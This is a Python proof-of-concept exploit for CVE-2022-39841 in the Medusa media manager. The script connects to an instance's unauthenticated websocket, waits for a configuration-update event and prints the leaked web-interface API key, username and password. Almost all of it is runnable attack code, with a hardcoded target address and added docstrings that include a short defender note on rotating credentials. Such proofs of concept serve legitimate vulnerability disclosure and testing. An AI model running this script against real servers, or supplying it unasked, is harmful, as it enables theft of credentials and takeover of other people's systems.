# Copyright (C) 2022 Mat Rollings
# https://github.com/stealthcopter/CVE-2022-39841
import json
import websocket
"""
This PoC script can be pointed at a password-protected instance of Medusa. It
connects to the unauthenticated websocket that the instance exposes, waits for
the configuration to be changed, and then prints the leaked API key, username
and password (CVE-2022-39841).
"""
# Connection settings for the Medusa instance under test.
IP = "192.168.1.237"  # host the websocket URL points at
PORT = 8083  # port used in the ws:// URL
WEBROOT = "/"  # URL prefix; "ws/ui" is appended directly to it
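def on_message(ws, message):
    """Parse one websocket frame and print web-interface secrets if present.

    The frame is decoded as JSON. Only frames whose ``event`` is
    ``configUpdated`` and whose ``data.config`` is non-empty are acted on:
    the ``apiKey``, ``username`` and ``password`` fields of
    ``config['webInterface']`` are printed on one line (missing fields print
    as ``None``) and the connection is closed.

    Defender note: what this demonstrates is that ``configUpdated`` frames
    carry the web-interface secrets to a client that never authenticated.
    Any instance that was reachable this way should have its API key and
    password rotated once the websocket is protected.

    NOTE(review): indentation was lost in this listing; ``ws.close()`` is
    assumed to sit inside the ``if config`` branch - confirm against the
    original file.

    Args:
        ws: Connection object; only its ``close()`` method is used.
        message: Raw frame text, expected to be a JSON object.

    Raises:
        ValueError: If ``message`` is not valid JSON (from ``json.loads``).
    """
    obj = json.loads(message)

    # Frames that are not JSON objects, or that belong to other events,
    # carry nothing this handler reads.
    if not isinstance(obj, dict) or obj.get('event') != 'configUpdated':
        return

    # 'data' may be absent or null; the original dereferenced it
    # unconditionally and raised AttributeError in that case.
    data = obj.get('data')
    if not isinstance(data, dict):
        return

    config = data.get('config')
    if not config:
        return

    # A null 'webInterface' value is treated like a missing one.
    webinterface = config.get('webInterface') or {}
    apiKey = webinterface.get('apiKey')
    username = webinterface.get('username')
    password = webinterface.get('password')
    print(f'{apiKey} {username} {password}')
    ws.close()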
def on_error(ws, error):
    """Print the error object handed to this callback; ``ws`` is unused."""
    print(error)
def on_close(ws, close_status_code, close_msg):
    """Print a fixed banner; the close status code and message are ignored."""
    banner = "### closed ###"
    print(banner)
def on_open(ws):
    """Print a fixed banner when the callback fires; ``ws`` is unused."""
    banner = "### Opened connection ###"
    print(banner)
# Build the endpoint once: it is echoed for the operator and then used to
# connect. The ws:// scheme is unencrypted, so frames cross the network in
# cleartext.
_endpoint = f"ws://{IP}:{PORT}{WEBROOT}ws/ui"
print(_endpoint)

# NOTE(review): tracing is verbose and presumably echoes received frames,
# so treat any captured console output as containing the leaked secrets.
websocket.enableTrace(True)

_callbacks = {
    "on_open": on_open,
    "on_message": on_message,
    "on_error": on_error,
    "on_close": on_close,
}
ws = websocket.WebSocketApp(_endpoint, **_callbacks)

# Runs until the connection ends, with a keep-alive ping every 60 seconds.
ws.run_forever(ping_interval=60)